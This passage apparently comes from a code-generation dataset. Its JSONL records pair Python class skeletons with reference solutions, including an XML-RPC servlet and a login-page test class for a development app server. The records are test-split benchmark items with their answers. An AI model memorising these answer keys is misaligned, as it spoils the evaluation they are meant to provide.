"test", "star_events_count": 5} {"blob_id": "389b925eaf10f64c913a9b22c06b1bac77b01162", "bodies": ["SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\nself.register_introspection_functions()\nself._dispatch_method = dispatch_method", "try:\n return self.funcs[name](*params)\nexcept KeyError:\n pass\nreturn self._dispatch_method(name, params)", "data = to_str(request.read_data())\nresult = self._marshaled_dispatch(data, self._simple_dispatch)\nresponse.send_content(200, result, 'text/xml')"], "bodies_text": "<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "class_docstring": "A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor", "class_name": "_XmlRpcServlet", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000193", "length_bytes": 8341, "license_type": "permissive", "methods": [{"docstring": "Sets up the servlet", "name": "__init__", "signature": "def __init__(self, dispatch_method, encoding=None)"}, {"docstring": "Dispatch method", "name": "_simple_dispatch", "signature": "def _simple_dispatch(self, name, params)"}, {"docstring": "Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler", "name": "do_POST", "signature": "def do_POST(self, request, response)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000599", "prompt": "Implement the Python class `_XmlRpcServlet` described below.\n\nClass description:\nA XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\n\nMethod signatures and docstrings:\n- def __init__(self, dispatch_method, encoding=None): Sets up the servlet\n- def _simple_dispatch(self, name, params): Dispatch method\n- def do_POST(self, request, response): Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler", "prompted_full_text": "Implement the Python class `_XmlRpcServlet` described below.\n\nClass description:\nA XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\n\nMethod signatures and docstrings:\n- def __init__(self, dispatch_method, encoding=None): Sets up the servlet\n- def _simple_dispatch(self, name, params): Dispatch method\n- def do_POST(self, request, response): Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\n\n<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "revision_id": "1d0add361ca219da8fdf72bb9ba8cb0ade01ad2f", "skeleton": "<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n", "source": "the_stack_v2_python_sparse", "source_path": "pelix/remote/xml_rpc.py", "source_repo": "tcalmant/ipopo", "split": "test", "star_events_count": 67} {"blob_id": "1ffa5814cc5ee2da8d735c79e1674aef1aecfad4", "bodies": ["host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {}\naction = ''\nset_email = ''\nset_admin = False\ncontinue_url = ''\nstatus, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertFalse(set_cookie)\nself.assertEqual('text/html; charset=utf-8', content_type)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {}\naction = 'Login'\nset_email = EMAIL\nset_admin = False\ncontinue_url = ''\nexpected_set = login._set_user_info_cookie(set_email, set_admin).strip()\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual('http://%s%s' % (host, path_info), location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual(continue_url, location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\naction = 'Logout'\nset_email = ''\nset_admin = False\ncontinue_url = ''\nexpected_set = login._clear_user_info_cookie().strip()\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual('http://%s%s' % (host, path_info), location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual(continue_url, location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\naction = ''\nset_email = ''\nset_admin = False\ncontinue_url = '/my/fancy/url'\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertFalse(set_cookie)\nself.assertEqual('text/html; charset=utf-8', content_type)\nself.assertIsInstance(content_type, str)", "environ = {}\nwsgiref.util.setup_testing_defaults(environ)\nenviron['SERVER_NAME'] = 'do_not_use'\nenviron['SERVER_PORT'] = '666'\nenviron['SERVER_PROTOCOL'] = 'HTTP/1.1'\nenviron['HTTP_HOST'] = host\nenviron['PATH_INFO'] = path_info\nenviron['REQUEST_METHOD'] = method\nif cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\nquery_dict = {}\nif action:\n query_dict['action'] = action\nif set_email:\n query_dict['email'] = set_email\nif set_admin:\n query_dict['admin'] = set_admin\nif continue_url:\n query_dict['continue'] = continue_url\nif query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\nresponse_dict = {}\n\ndef start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\nlogin.application(environ, start_response)\nreturn (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))"], "bodies_text": "<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "class_docstring": "Tests the various ways of invoking the login page.", "class_name": "LoginPageTest", "detected_licenses": ["Apache-2.0", "LGPL-2.1-or-later", "BSD-3-Clause", "MIT", "GPL-2.0-or-later", "MPL-1.1"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000194", "length_bytes": 12436, "license_type": "permissive", "methods": [{"docstring": "Tests just accessing the login URL with no params.", "name": "test_no_params", "signature": "def test_no_params(self)"}, {"docstring": "Tests when setting the user info with and without continue URL.", "name": "test_login", "signature": "def test_login(self)"}, {"docstring": "Tests when logging out with and without continue URL.", "name": "test_logout", "signature": "def test_logout(self)"}, {"docstring": "Tests when the user is already logged in.", "name": "test_passive", "signature": "def test_passive(self)"}, {"docstring": "Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu", "name": "_run_test", "signature": "def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET')"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004150", "prompt": "Implement the Python class `LoginPageTest` described below.\n\nClass description:\nTests the various ways of invoking the login page.\n\nMethod signatures and docstrings:\n- def test_no_params(self): Tests just accessing the login URL with no params.\n- def test_login(self): Tests when setting the user info with and without continue URL.\n- def test_logout(self): Tests when logging out with and without continue URL.\n- def test_passive(self): Tests when the user is already logged in.\n- def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'): Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu", "prompted_full_text": "Implement the Python class `LoginPageTest` described below.\n\nClass description:\nTests the various ways of invoking the login page.\n\nMethod signatures and docstrings:\n- def test_no_params(self): Tests just accessing the login URL with no params.\n- def test_login(self): Tests when setting the user info with and without continue URL.\n- def test_logout(self): Tests when logging out with and without continue URL.\n- def test_passive(self): Tests when the user is already logged in.\n- def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'): Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\n\n<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "revision_id": "be17e5f658d7b42b5aa7eeb7a5ddd4962f3ea82f", "skeleton": "<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, 